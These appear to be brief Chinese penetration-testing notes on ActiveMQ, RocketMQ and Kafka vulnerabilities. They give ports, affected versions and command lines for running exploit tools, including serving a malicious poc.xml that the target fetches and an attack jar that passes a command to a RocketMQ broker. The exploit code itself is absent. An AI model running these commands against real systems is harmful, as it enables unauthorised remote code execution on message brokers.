处理平台安全-ActiveMQ-RocketMQ-Kafka-CVE #
ActiveMQ #
界面如下,通常通过端口 8161 web 61616 tcp远程访问 来判断或者通过功能点来判断
CVE-2022-41678 #
在5.16.5, 5.17.3版本及以前 python poc.py -u admin -p admin http://xx:8161/
2、CVE-2023-46604 #
python3 -m http.server 6666 python3 poc.py 目标IP 目标端口 http://IP:6666/poc.xml python “poc (1).py” 192.168.79.136 61616 http://xx:8000/poc.xml
通过建立网络
POC具体内容
RocketMQ #
9876 NameServer通信端口用于客户端路由请求和Broker注册发现 10911 Broker主监听端口处理消息发送/消费等核心服务
搭建很麻烦遇到直接测试
探测:d:\Python3.8\python.exe check.py –ip ip –port 9876
CVE-2023-33246 CVE-2023-37582
POC java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackBroker –target ip:10911 –cmd “xxxx”
POC python.exe CVE-2023-37582.py -ip ip -p 9876
Kafka #
分布式流处理平台,用于高吞吐量实时数据传输存储和处理, 广泛应用于日志收集、消息队列、数据管道、实时分析等场景。
CVE-2023-25194 漏洞影响版本:2.3.0 <= Apache Kafka <= 3.3.2 https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md 需要JNDI 字节码搭建攻击